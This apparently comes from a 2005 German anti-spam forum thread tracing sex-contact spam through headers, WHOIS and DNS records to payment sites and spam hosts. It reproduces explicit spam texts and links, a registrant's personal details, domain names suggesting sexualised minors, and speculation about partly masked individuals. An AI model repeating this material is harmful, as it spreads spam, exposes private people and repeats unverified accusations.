MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--15966415583646846769"
X-IP: 8.140.127.251
X-WEBDE-FORWARD: xxx @web.de -> xxx @gmx.net
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 5 (Score=11.911; MIME_BOUND_DD_DIGITS MSGID_SPAM_CAPS
RCVD_NUMERIC_HELO RCVD_DOUBLE_IP_SPAM)
X-GMX-UID: [UID filtered]

----15966415583646846769
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hallo
es hat bei mir wirklich geklappt. H=E4tte ich nicht gedacht, aber es ging =
noch am ersten Tag.
Echt der absolute Wahnsinn

Probier es einfach mal aus und sage mir was bei dir ging.

Jeden Tag wenn ich will was anderes. Da lohnt sich das baggern in der Disk=
o nicht mehr.

www. spasskontakte.info/livetreff/

Wenn du Lust hast k=F6nnen wir ja mal was zusammen machen.

Melde dich.

Solltest du keine Nachrichten mehr empfangen wollen,
trag dich hier aus: www. spasskontaklte.info/out.php

----15966415583646846769--

www. spasskontakte.info/livetreff/

redirects to:

http://digitalpayment. de/paygate/useremail.php ---> 83.64.251.66 --->
MAXOLUTION Internet ServiceGmbH & Co KG, Stockern, Austria/Inode




Domain ID:D10837902-LRMS
Domain Name:SPASSKONTAKTE.INFO ---> 61.235.117.169 ---> China Railcom
Guangdong Shenzhen Subbranch
Created On:14-Sep-2005 xx:xx:xx UTC
Last Updated On:24-Sep-2005 xx:xx:xx UTC
Expiration Date:14-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:C11402378-LRMS
Registrant Name:Peter Stone
Registrant Organization:Private
Registrant Street1:Ruda 138
Registrant City:Horni Mesto
Registrant State/Province:ME
Registrant Postal Code:79344
Registrant Country:CZ
Registrant Email:stoni [at] online.ie
Admin ID:C11402381-LRMS
Admin Name:Peter Stone
Admin Organization:Private
Admin Street1:Ruda 138
Admin City:Horni Mesto
Admin State/Province:ME
Admin Postal Code:79344
Admin Country:CZ
Admin Email:stoni [at] online.ie
Billing ID:C11402380-LRMS
Billing Name:Peter Stone
Billing Organization:Private
Billing Street1:Ruda 138
Billing City:Horni Mesto
Billing State/Province:ME
Billing Postal Code:79344
Billing Country:CZ
Billing Email:stoni [at] online.ie
Tech ID:C11402379-LRMS
Tech Name:Peter Stone
Tech Organization:Private
Tech Street1:Ruda 138
Tech City:Horni Mesto
Tech State/Province:ME
Tech Postal Code:79344
Tech Country:CZ
Tech Email:stoni [at] online.ie
Name Server:NS1.UNIDAN.INFO ---> 61.235.117.167 ---> China Railcom
Guangdong Shenzhen Subbranch
Name Server:NS2.UNIDAN.INFO ---> 61.235.117.169 ---> CRTC
Name Server:NS3.UNIDAN.INFO ---> 221.4.179.236 ---> CNCGROUP-GD
Name Server:NS4.UNIDAN.INFO ---> 221.4.179.234 ---> CNCGROUP-GD

Registrar: eNom, Inc. (R126-LRMS)



Domain ID:D10869074-LRMS
Domain Name:UNIDAN.INFO
Created On:21-Sep-2005 xx:xx:xx UTC
Last Updated On:29-Sep-2005 xx:xx:xx UTC
Expiration Date:21-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:35669C2E92D6FEF7
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:8939 S. Sepulveda Blvd
Registrant Street2:8939 S. Sepulveda Blvd
Registrant City:Westchester
Registrant State/Province:CA
Registrant Postal Code:90045
Registrant Country:US
Registrant Phone:+1.6613102107
Registrant Email:9b36e3a1833b4efa9f8f0a6f5b7d3005.protect [at] whoisguard.com
Admin ID:35669C2E92D6FEF7
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Admin Street1:8939 S. Sepulveda Blvd
Admin Street2:8939 S. Sepulveda Blvd
Admin City:Westchester
Admin State/Province:CA
Admin Postal Code:90045
Admin Country:US
Admin Phone:+1.6613102107
Admin Email:9b36e3a1833b4efa9f8f0a6f5b7d3005.protect [at] whoisguard.com
Billing ID:35669C2E92D6FEF7
Billing Name:WhoisGuard Protected
Billing Organization:WhoisGuard
Billing Street1:8939 S. Sepulveda Blvd
Billing Street2:8939 S. Sepulveda Blvd
Billing City:Westchester
Billing State/Province:CA
Billing Postal Code:90045
Billing Country:US
Billing Phone:+1.6613102107
Billing Email:9b36e3a1833b4efa9f8f0a6f5b7d3005.protect [at] whoisguard.com
Tech ID:35669C2E92D6FEF7
Tech Name:WhoisGuard Protected
Tech Organization:WhoisGuard
Tech Street1:8939 S. Sepulveda Blvd
Tech Street2:8939 S. Sepulveda Blvd
Tech City:Westchester
Tech State/Province:CA
Tech Postal Code:90045
Tech Country:US
Tech Phone:+1.6613102107
Tech Email:9b36e3a1833b4efa9f8f0a6f5b7d3005.protect [at] whoisguard.com
Name Server:NS1.UNIDAN.INFO
Name Server:NS2.UNIDAN.INFO
Name Server:NS3.UNIDAN.INFO
Name Server:NS4.UNIDAN.INFO

Registrar: eNom, Inc. (R126-LRMS)


61.235.117.167 - IP hosts 23 Total Domains ...
Showing 1 - 23 out of 23

Domain Name
1 ALLHUGEDICKS.COM.
2 AMATEURHONIESSITE.COM.
3 BARNFUNWORLD.COM.
4 BATHBANGERSPLACE.COM.
5 CLICKONETWO.NET.
6 CYBERDRIPPYSLIT.COM.
7 EASYFEMEJAC.COM.
8 FARMHOONLINE.COM.
9 FIVEFINGERGIRL.COM.
10 HESGOTLOTTAGAME.COM.
11 HIGHLYTECH.COM.
12 JUSTCUMINSIDE.COM.
13 KEYARTICLE.COM.
14 SHEWILLGETITOFF.COM.
15 SLEAZEESCORT.COM.
16 SMALLTYE.COM.
17 SOMEMORETHANOTHERS.COM.
18 SPORTWEIGHT.COM.
19 SUPERNICETITTIES.COM.
20 SUPERREAD.COM.
21 SUZETHEFLOOZ.COM.
22 TIMEDVIEW.COM.
23 YAGOTTALOVEIT.COM.


Ref: SBL28985

221.4.179.224/28 is listed on the Spamhaus Block List (SBL)

23-Sep-2005 14:57 GMT | SR03

wayhealth.info / oldnight.info / dnsday.biz / dnsandyou.biz

(Sep 11, 2005) 221.4.179.224/29 -> 221.4.179.224/28

x.dotmate.info. IN A 221.4.179.228
dotmate.info. IN NS ns1.dnsgood.biz.
dotmate.info. IN NS ns2.dnsgood.biz.
ns1.dnsgood.biz. IN A 221.4.179.227
ns2.dnsgood.biz. IN A 221.4.179.229

strangecollective.info. 300 IN A 221.4.179.228
strangecollective.info. 300 IN NS ns2.dnsday.biz.
strangecollective.info. 300 IN NS ns1.dnsday.biz.
ns1.dnsday.biz. 549 IN A 221.4.179.227

leeshine.info. 300 IN A 221.4.179.228
leeshine.info. 300 IN NS ns2.dnsday.biz.
leeshine.info. 300 IN NS ns1.dnsday.biz.
ns1.dnsday.biz. 900 IN A 221.4.179.227
ns2.dnsday.biz. 900 IN A 221.4.179.229

INTELLigentone.inFO. 8m56s IN A 221.4.179.237
INTELLigentone.inFO. 23h59m56s IN NS ns4.virtualuse.com.
INTELLigentone.inFO. 23h59m56s IN NS ns3.virtualuse.com.
INTELLigentone.inFO. 23h59m56s IN NS ns2.virtualuse.com.
INTELLigentone.inFO. 23h59m56s IN NS ns1.virtualuse.com.
ns4.virtualuse.com. 9h14m51s IN A 194.126.190.9
ns3.virtualuse.com. 9h14m51s IN A 194.126.188.30
ns2.virtualuse.com. 9h14m51s IN A 65.182.132.5
ns1.virtualuse.com. 9h14m51s IN A 221.4.179.235


Ref: SBL32279

221.4.179.234/32 is listed on the Spamhaus Block List (SBL)

26-Sep-2005 09:40 GMT | SR02

Taiwan Media Ltd
221.4.179.234/32 is listed on the Register Of Known Spam Operations
(ROKSO) database as being assigned to, under the control of, or
providing service to a known professional spam operation run by Taiwan
Media Ltd.
kvast.info (morphing IPs)
see SBL32278

2005-09-20 - 221.4.179.236/32

$ dig @dns3.kvast.info xvirgins.biz ns

; <<>> DiG 9.2.4 <<>> @dns3.kvast.info xvirgins.biz ns
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, ID: [ID filtered]
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; QUESTION SECTION:
;xvirgins.biz. IN NS

;; ANSWER SECTION:
xvirgins.biz. 600 IN NS ns4.zarkon.info.
xvirgins.biz. 600 IN NS ns1.zarkon.info.
xvirgins.biz. 600 IN NS ns2.zarkon.info.
xvirgins.biz. 600 IN NS ns3.zarkon.info.

;; ADDITIONAL SECTION:
ns2.zarkon.info. 22512 IN A 210.21.117.110
ns3.zarkon.info. 22512 IN A 210.21.117.108
ns4.zarkon.info. 22512 IN A 210.21.117.110

gation
30.09.2005, 15:31
ist ip4 nicht M-P M aus Flensburg / Harrislee? Vielleicht hat man einfach "no respect"? Führt(e) die memberar**.cc-IP nicht auch (mal?) dort hin? Führte das nicht zu einer dänischen Schule in Husby? Mein Gedächtnis ist so schlecht... Da war doch auch noch ein Sv* Gr*, der zu diesem M-P M gehört hatte? Der namensgleich ist mit einem Sv* Gr*, der noch ganz andere Dinge tut.
Ich müsste das mal nachlesen, aber vielleicht gibt mir hier jemand einen kleinen Hinweis, dass das alles schon en detail recherchiert ist. Dann kann ich mir das sparen und es bei diesen Hinweisen belassen.
Gruß!
gation/sig

Du meinst den Rechtsaussen...


@sirius:
Ihr habt hier eine andere Art der Vorgehensweise, mit diesem Headerinterpretieren und so, kenn ich so ja gar nicht ;) Ausserdem habe ich Deine Antwort übersehen bis gerade eben, sorry...

Rechtsaussen der Truppe? Schreib mir das doch mal konkreter, ich bin da nicht firm... (Leo??? Dödel??? Ich kenn die ja nicht)

Aber wenn ich

Registrant Organization:Private
Registrant Street1:Ruda 138
Registrant City:Horni Mesto

lese, com´mt mir - ganz geheim - das Kotzen. Ich hoffe, ich kotze weit genug, um den Domainverband in Wien zu treffen...

Also noch einmal: Ich hätte da gerne eine kurze Erklärung, da es natürlich zwischen "Private Investigations" und dem hier die ein oder anderen Dutzend Querverbindungen (http://forum.computerbetrug.de/viewtopic.php?p=61369#61369) gibt...

gation/sig

kjz1
06.10.2005, 09:36
Heute wieder frisch eingetroffen:

From xxx @online.ie Thu Oct 6 xx:xx:xx 2005
Return-Path: <xxx @online.ie>
X-Flags: 1001
Delivered-To: GMX delivery to xxx @gmx.net
Received: (qmail invoked by alias); 06 Oct 2005 xx:xx:xx -0000
Received: from mx24.web.de (EHLO mx24.web.de) [217.72.192.190]
by mx0.gmx.net (mx012) with SMTP; 06 Oct 2005 xx:xx:xx +0200
Received: from [61.173.80.41] (helo=217.72.192.188) ---> CHINANET-SH
by mx24.web.de with smtp (WEB.DE 4.105 #323)
ID: [ID filtered]
Received: from 160.48.206.80 by 61.173.80.41; Wed, 05 Oct 2005 xx:xx:xx -0500
Message-ID: [ID filtered]
From: "Pete Mcintyre" <xxx @online.ie>
Reply-To: "Pete Mcintyre" < xxx @online.ie>
To: xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de
Subject: Ich kann und du?
Date: Thu, 06 Oct 2005 xx:xx:xx +0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--5689668441078160"
X-IP: 196.135.128.195
X-WEBDE-FORWARD: xxx @web.de -> xxx @gmx.net
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 5 (Score=11.911; MIME_BOUND_DD_DIGITS MSGID_SPAM_CAPS RCVD_NUMERIC_HELO RCVD_DOUBLE_IP_SPAM)
X-GMX-UID: [UID filtered]

----5689668441078160
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hallo
es hat bei mir wirklich geklappt. H=E4tte ich nicht gedacht, aber es ging =
noch am ersten Tag.
Echt der absolute Wahnsinn

Probier es einfach mal aus und sage mir was bei dir ging.

Jeden Tag wenn ich will was anderes. Da lohnt sich das baggern in der Disk=
o nicht mehr.

www. spasskontakte.info/livetreff/

Wenn du Lust hast k=F6nnen wir ja mal was zusammen machen.

Melde dich.

Solltest du keine Nachrichten mehr empfangen wollen,
trag dich hier aus: www.spasskontakte.info/out.php

----5689668441078160--


www. spasskontakte.info/livetreff/

redirects to:

http://digitalpayment. de/paygate/useremail.php ---> 83.64.251.66 ---> Maxolution/Inode, AT





Domain ID:D10837902-LRMS
Domain Name:SPASSKONTAKTE.INFO ---> 61.235.117.169 ---> CRGdSzS/CRTC
Created On:14-Sep-2005 xx:xx:xx UTC
Last Updated On:24-Sep-2005 xx:xx:xx UTC
Expiration Date:14-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:C11402378-LRMS
Registrant Name:Peter Stone
Registrant Organization:Private
Registrant Street1:Ruda 138
Registrant City:Horni Mesto
Registrant State/Province:ME
Registrant Postal Code:79344
Registrant Country:CZ
Registrant Email:stoni [at] online.ie
Admin ID:C11402381-LRMS
Admin Name:Peter Stone
Admin Organization:Private
Admin Street1:Ruda 138
Admin City:Horni Mesto
Admin State/Province:ME
Admin Postal Code:79344
Admin Country:CZ
Admin Email:stoni [at] online.ie
Billing ID:C11402380-LRMS
Billing Name:Peter Stone
Billing Organization:Private
Billing Street1:Ruda 138
Billing City:Horni Mesto
Billing State/Province:ME
Billing Postal Code:79344
Billing Country:CZ
Billing Email:stoni [at] online.ie
Tech ID:C11402379-LRMS
Tech Name:Peter Stone
Tech Organization:Private
Tech Street1:Ruda 138
Tech City:Horni Mesto
Tech State/Province:ME
Tech Postal Code:79344
Tech Country:CZ
Tech Email:stoni [at] online.ie
Name Server:NS1.UNIDAN.INFO ---> 61.235.117.167 ---> CRGdSzS/CRTC
Name Server:NS2.UNIDAN.INFO ---> 61.235.117.169 ---> CRGdSzS/CRTC
Name Server:NS3.UNIDAN.INFO ---> 221.4.179.236 ---> CNCGROUP-GD
Name Server:NS4.UNIDAN.INFO ---> 221.4.179.234 ---> CNCGROUP-GD

Registrar: eNom, Inc. (R126-LRMS)




Domain ID:D10869074-LRMS
Domain Name:UNIDAN.INFO
Created On:21-Sep-2005 xx:xx:xx UTC
Last Updated On:06-Oct-2005 xx:xx:xx UTC
Expiration Date:21-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:B68AEC089DCCE5E6
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:8939 S. Sepulveda Blvd
Registrant Street2:8939 S. Sepulveda Blvd
Registrant City:Westchester
Registrant State/Province:CA
Registrant Postal Code:90045
Registrant Country:US
Registrant Phone:+1.6613102107
Registrant Email:5f159f448a8e40e4be5cdab2826741cd.protect [at] whoisguard.com
Admin ID:B68AEC089DCCE5E6
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Admin Street1:8939 S. Sepulveda Blvd
Admin Street2:8939 S. Sepulveda Blvd
Admin City:Westchester
Admin State/Province:CA
Admin Postal Code:90045
Admin Country:US
Admin Phone:+1.6613102107
Admin Email:5f159f448a8e40e4be5cdab2826741cd.protect [at] whoisguard.com
Billing ID:B68AEC089DCCE5E6
Billing Name:WhoisGuard Protected
Billing Organization:WhoisGuard
Billing Street1:8939 S. Sepulveda Blvd
Billing Street2:8939 S. Sepulveda Blvd
Billing City:Westchester
Billing State/Province:CA
Billing Postal Code:90045
Billing Country:US
Billing Phone:+1.6613102107
Billing Email:5f159f448a8e40e4be5cdab2826741cd.protect [at] whoisguard.com
Tech ID:B68AEC089DCCE5E6
Tech Name:WhoisGuard Protected
Tech Organization:WhoisGuard
Tech Street1:8939 S. Sepulveda Blvd
Tech Street2:8939 S. Sepulveda Blvd
Tech City:Westchester
Tech State/Province:CA
Tech Postal Code:90045
Tech Country:US
Tech Phone:+1.6613102107
Tech Email:5f159f448a8e40e4be5cdab2826741cd.protect [at] whoisguard.com
Name Server:NS1.UNIDAN.INFO
Name Server:NS2.UNIDAN.INFO
Name Server:NS3.UNIDAN.INFO
Name Server:NS4.UNIDAN.INFO

Registrar: eNom, Inc. (R126-LRMS)




61.235.117.167 - IP hosts 23 Total Domains ...
Showing 1 - 23 out of 23

Domain Name
1 ALLHUGEDICKS.COM.
2 AMATEURHONIESSITE.COM.
3 BARNFUNWORLD.COM.
4 BATHBANGERSPLACE.COM.
5 CLICKONETWO.NET.
6 CYBERDRIPPYSLIT.COM.
7 EASYFEMEJAC.COM.
8 FARMHOONLINE.COM.
9 FIVEFINGERGIRL.COM.
10 HESGOTLOTTAGAME.COM.
11 HIGHLYTECH.COM.
12 JUSTCUMINSIDE.COM.
13 KEYARTICLE.COM.
14 SHEWILLGETITOFF.COM.
15 SLEAZEESCORT.COM.
16 SMALLTYE.COM.
17 SOMEMORETHANOTHERS.COM.
18 SPORTWEIGHT.COM.
19 SUPERNICETITTIES.COM.
20 SUPERREAD.COM.
21 SUZETHEFLOOZ.COM.
22 TIMEDVIEW.COM.
23 YAGOTTALOVEIT.COM.


83.64.251.66 - IP hosts 4 Total Domains ...
Showing 1 - 4 out of 4

Domain Name
1 DIGITAL-PAYMENT.COM.
2 DIGITAL-PAYMENTS.NET.
3 DIGITAL-PAYMENTS.ORG.
4 DIGITALPAYMENTS.ORG.


Abgezockt wird wieder über unsere altbekannten 'Freunde' in Stockach, AT. Wundert mich nur, wie die an die ansionsten von mir nie verwendete Adresse kommen. Auf diese Adresse erhalte ich absolut 0 Mails, bis auf den regelmässigen Spam von genau diesem Spammer. Verkauft Web.de Adressen?

Viele Grüße,

- kjz

corlis
06.10.2005, 10:33
unwahrscheinlich, dass web.de die adressen verkauft. Allerdings wird bei web.de mittlerweile gerne "geraten", frei nach dem Motto: Wo kein Dämon, da ein Postfach...

sis
06.10.2005, 11:18
Allerdings wird bei web.de mittlerweile gerne "geraten", frei nach dem Motto: Wo kein Dämon, da ein Postfach...Das ist sehr unwahrscheinlich, weil zumindest der gleichlautende und an mich versandte Spam auch enorm schwer zu ratende eMail-Adressen mit Zahlen usw. enthält. Nichtsdestotrotz hier auch der heutige Header von mir (eMail enthält den heute bereits geposteten Müll):
Return-Path: </anonymized/@online.ie>
Received: from [59.33.218.215] (helo=217.72.192.149)
by mx22.web.de with smtp (WEB.DE 4.105 #323)
ID: [ID filtered]
Received: from 200.176.234.28 by 59.33.218.215; Thu, 06 Oct 2005 /anonymized/
Message-ID: [ID filtered]
From: "/anonymized/" </anonymized/@online.ie>
Reply-To: "/anonymized/" </anonymized/@online.ie>
To: <... [at] web.de>
Subject: Ich kann und du?
Date: Wed, 05 Oct 2005 /anonymized/
X-Mailer: eGroups Message Poster
MIME-Version: 1.0

kjz1
06.10.2005, 13:11
unwahrscheinlich, dass web.de die adressen verkauft. Allerdings wird bei web.de mittlerweile gerne "geraten", frei nach dem Motto: Wo kein Dämon, da ein Postfach...

Da glaube ich nicht so ganz dran. Der Localpart ist länger und enthält den Namen noch mit anderen Buchstaben ergänzt. 'Brute Force' würde da Mails in Milliardenzahl erfordern. Ausserdem sollte dann auch Spam von anderen Konsorten kommen. Nein es kommt aber nur dieser eine Spam, nichts sonst, auch keine 'normale' Mail.

- kjz

corlis
06.10.2005, 15:24
Naja, Milliarden bedarf es da nicht, eher einem "intelligenten" Rater... Manche Progrämmchen erweisen sich ja als äußerst talentiert, was sowas angeht.

Setzt web.de eigentlich cookies, die die EMail-Adresse (solange eingeloggt) enthalten? Das wäre eine andere Variante, mit der man gezielt nach "interessierten Kunden" "forschen" könnte (solch einen Verdacht hege ich schon länger, da mancher spam etwas zu "themenbezogen" zu kommen scheint [Anm.: Es handelt sich hierbei um Investment-Spam]).

kjz1
06.10.2005, 15:42
Naja, Milliarden bedarf es da nicht, eher einem "intelligenten" Rater... Manche Progrämmchen erweisen sich ja als äußerst talentiert, was sowas angeht.
Das wäre dann eher so etwas in der Art: kombiniere Localpart von Provider A mit Domain von Provider B...

Setzt web.de eigentlich cookies, die die EMail-Adresse (solange eingeloggt) enthalten? Das wäre eine andere Variante, mit der man gezielt nach "interessierten Kunden" "forschen" könnte (solch einen Verdacht hege ich schon länger, da mancher spam etwas zu "themenbezogen" zu kommen scheint [Anm.: Es handelt sich hierbei um Investment-Spam]).
Die Adresse habe ich nur mal vor langer Zeit als Weiterleitung eingerichtet, und mich danach nie mehr per Webinterface eingeloggt. Da kam jahrelang nichts, und dann seit einigen Monaten plötzlich nur regelmässig dieser Porno-Spam. Die Adresse könnte natürlich auch per Virus geharvestet sein. Da ich die Adresse aber nicht nutze, wer sollte dies in seinem Adressbuch haben?

- kjz

corlis
06.10.2005, 16:34
Das wäre dann eher so etwas in der Art: kombiniere Localpart von Provider A mit Domain von Provider B...

Ne, eher eines dieser Silbendinger, die versuchen, nach gewissen Regeln Namen herzustellen + @web.de. Im Fünferpack verschickt ergeben sich daraus nicht die schlechtesten Trefferchancen (solche EMails erhalte ich zuhauf).

kjz1
07.10.2005, 09:42
Heute hier wieder von derselben Machart aufgeschlagen:

Eingeworfen über den Zombie: virtua-cwb242-33.ctb.virtua.com.br

Beworben wird: www. ultraheiss.info/fickauto/

was aber nur wieder umleitet auf: www. neue-hits.info

Ziel ist aber letztendlich wieder nur das Abzocksystem
der altbekannten Gebrüder P. aus Stockach in AT: digitalpayment .de

Indode (und das zuständige Fernmeldebüro in Wien) müssen doch schon Tausende Complaints über diese 'saubere' Firma erhalten haben und Spamming ist auch in Österreich illegal. Warum bietet Inode denen seit Monaten immer noch den Uplink? Da kann man doch nur einen 'pink contract' vermuten.

- kjz

Catcher
07.10.2005, 18:43
www. ultraheiss.info/fickauto/

scheint abgestellt zu sein...

Catcher
07.10.2005, 20:44
Web


Es wurden keine mit Ihrer Suchanfrage - www. ultraheiss.info/fickauto/ - übereinstimmenden Dokumente gefunden.

Vorschläge:
- Vergewissern Sie sich, dass alle Wörter richtig geschrieben sind.
- Probieren Sie andere Suchbegriffe.
- Probieren Sie allgemeinere Suchbegriffe.

kjz1
07.10.2005, 22:47
Soeben wieder eingetroffen:

Zombie: 84.41.10.4 ---> SI-SOFTNET-20040907

Beworben: www. soforttreffen24.info/real ---> 221.4.181.73 ---> CNCGROUP-GD, das ist: Spamhaus Ref. SBL33010 --> Leo Kuvayev / BadCow
Also zur Abwechslung mal nicht bei Mailtrain, sondern bei Leo gehostet.
DNS: ns...UNIDAN.INFO

- kjz

Bernd_E
16.10.2005, 11:26
Received: from boobie.cc ([213.159.10.213])
by winfaktenigate ([192.168.0.3], envelope-sender=<andrea [at] boobie.cc>)
with No Spam Today! Service V2.3.2.2 Freeware
for 192.168.0.2; Fri, 14 Oct 2005 xx:xx:xx +0200
Received: from 10.0.101.3
by boobie.cc with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Thu, 13 Oct 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: =?iso-8859-1?Q?Unzensierte_Einblicke_-_=DCber_1.000_Cams?=
Date: Thu, 13 Oct 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To: poor [at] spamvictim.tld
From: "Andrea" <andrea [at] boobie.cc>
Hier dreht sich alles nur um die schärfste und hemmungsloseste Erotik
überhaupt. Cams, überall sind die Objektive unserer Cams und sie sehen
alles. Sie sehen scharfe Girls bei ihren heißen Soloshows. Sie sehen Männer,
die ihre schwule Seite ausleben und solche, die hetero sind. Sie sehen Paare
und wie sie es geil miteinander treiben.

Immer live dabei und immer neues und vollkommen abwechslungsreiches
Erotikprogramm, wie du es sonst nirgendwo bekommst. Private Sexshows ohne
Tabus und das auch zu Nischenthemen und Fetischerotik. Videos und Freechats
runden das heiße Erotikpaket gekonnt ab. Schau doch jetzt mal rein und
überzeuge dich selbst von dem einmaligen Programm...

h**p://www.boobie.cc/?ml=1&MID=10041894&WMID=63172&Spon=platb

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier
austragen:

h**p://www.boobie.cc/a.php?adr=xxxxx [at] winfakten.de

UM5232629

Es erfolgt ein Redirect zu
http://www.dnsstuff.com/tools/whois.ch?ip=privatelivecams.de

Interessant ist auch der RA, der Admin-C ist :lol:

Dotshead
16.10.2005, 11:55
Interessant ist auch der RA, der Admin-C ist :lol:

Naja der http://www.pornoanwalt.de ist ja ausreichend bekannt. ;)

Investi
16.10.2005, 12:06
Man beachte vor allem die absolut korrekte Umsetzung der gesetzlichen Vorgaben zur Impressumspflicht.
Da der Herr ja so pedantischauf Zuständigkeiten achtet, sollte ich evtl. mal über eine Abmahnung nachdenken. Meinen Eindruck von diesem Herrn nach einem persönlichen Telefonat möchte ich lieber nicht wiedergeben.

gation
16.10.2005, 12:58
Email Marketing und neue Regelungen zu
Spamming (M.D*) sollte sich also gut auskennen, der Herr. Zumal er doch mal in der Rechtsabteilung einer Firma gewesen sein soll, die spammern mitunter ziemlich eine vor den Latz knaollt...

Sirius
16.10.2005, 13:12
Hier ist sein OpenBC-Profil: http://tinyurl.com/bc5gz

Hier hat er als Tech-C lecker Domains:
amateurpages.de
arschfick.de
asia-teens.de
beobachtemich.de
bumskontakte.de
clubbizarr.de
deutschemaedchen.de
engeloecher.de
enge-votzen.de
fotos-gays.de
freestrip.de
gangbanggays.de
gaysanal.de
gay-fisten.de
gayschwaenze.de
girls-pictures.de
hure.de
jung-und-willig.de
lolitaerotic.de
lolitamaedchen.de
maedchenbeimsex.de
maedchenerotik.de
maedchensex.de
nacktejungen.de
nackte-teens.de
natursekt.de
peitsch-mich.de
privatelivecams.de
sado-maso.de
sadomasochismus.de
schuelerinnensex.de
schwangere-votzen.de
sexshocker.de
sexcall.de
sexmitteens.de
sexreport.de
teenies.de
teenmoesen.de
teenpornobilder.de
teenpornovideos.de
teensexseite.de
teenvotzen.de
voegeln.de
xxxticket.de

gation
16.10.2005, 14:50
tech-c? admin-c?
Na, immerhin sind von www.aktion-fuer-jugendschutz.de diese unsäglichen Brandstifterparolen verschwunden...

Die bisherigen Vermutungen, intelligente Kinder hätten früher Sex, weil sie intelligenter sind, ist möglicherweise so nicht korrekt; vielmehr ist es anzunehmen, dass diese intelligenter, weil sie früher Sex haben.
quelle (http://web.archive.org/web/20040614014517/http://www.aktion-fuer-jugendschutz.de/pus.html)
damaliges Impressum (http://web.archive.org/web/20041011225838/http://aktion-fuer-jugendschutz.de/impressum.html)
Dass so ein *** im Stile der "Rene Gunyon-Society" auf einer deutschen Webseite verbreitet werden darf, ist mir unverständlich...
(ob es sich für den Verantwortlichen einer solchen Seite ziemt, admin für die obigen domains zu sein - darüber will ich nicht urteilen...)

Bernd_E
18.10.2005, 19:32
Received: from boobie.cc ([213.159.10.213])
by winfaktenigate ([192.168.0.3], envelope-sender=<andrea [at] boobie.cc>)
with No Spam Today! Service V2.3.2.2 Freeware
for 192.168.0.2; Tue, 18 Oct 2005 xx:xx:xx +0200
Received: from 10.0.101.3
by boobie.cc with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 17 Oct 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: Angequatscht, abgeschleppt und durchgefickt
Date: Mon, 17 Oct 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To: poor [at] spamvictim.tld
From: "Andrea" <andrea [at] boobie.cc>
Reality ist hier das Stichwort. Spontan geht es hier nur um geile Lust. Kein
langes Vorspiel und keine gestellte Lust. Alles echt und genau das ist es
doch, was den Reiz ausmacht. Ronny, unser Superstecher ist geil auf echte
Muttis. Reife Mädchen, die es mal wieder richtig brauchen. Ronnys Masche:
Einfach drauf los gehen, anquatschen, abschleppen und dann geil flach legen
und dabei wird in jedes Loch gevögelt.

Du willst Ronnys Abenteuer miterleben und sehen, wie er eine scharfe Mutti
nach der Nächsten geil durchknallt und ihr richtig zeigt was es bedeutet mit
so einem tollen Lustprügel ordentlich bearbeitet zu werden? Ok, aber nicht
vergessen. Alles was Du hier bekommst ist spontan und absolut echt. Keine
Absprache, kein Drehbuch.

Hast Du Bock bei Ronnys heißem Treiben zuzuschauen? Dann geh einfach auf die
Seite und mache dir ein paar extrem versaute Stunden.

h**p://www.boobie.cc/?ml=1&MID=10041915&WMID=63172&Spon=platb

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier
austragen:

h**p://www.boobie.cc/a.php?adr=xyz [at] winfakten.de

UM5232629

webeinspunktnull
19.10.2005, 12:34
Received: from [217.173.157.177] (helo=mail5.cyberservices.tv)
by mx11.web.de with esmtp (WEB.DE 4.105 #323)
ID: [ID filtered]
for .Received: from cydb00.cyberservices.tv ([217.173.158.2])
by mail5.cyberservices.tv with esmtp (Exim 4.34)
ID: [ID filtered]
for ; Mon, 17 Oct 2005 xx:xx:xx +0200
Received: from root by cydb00.cyberservices.tv with local (Exim 4.34)
ID: [ID filtered]
for ; Mon, 17 Oct 2005 xx:xx:xx +0200
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="ISO-8859-1"
MIME-Version: 1.0
X-Mailer: MIME::Lite 2.117 (F2.6; A1.44; B2.12; Q2.03)
Date: Sun, 16 Oct 2005 xx:xx:xx UT
To:
From: Webmaster <webmaster [at] cyberservices.nl>
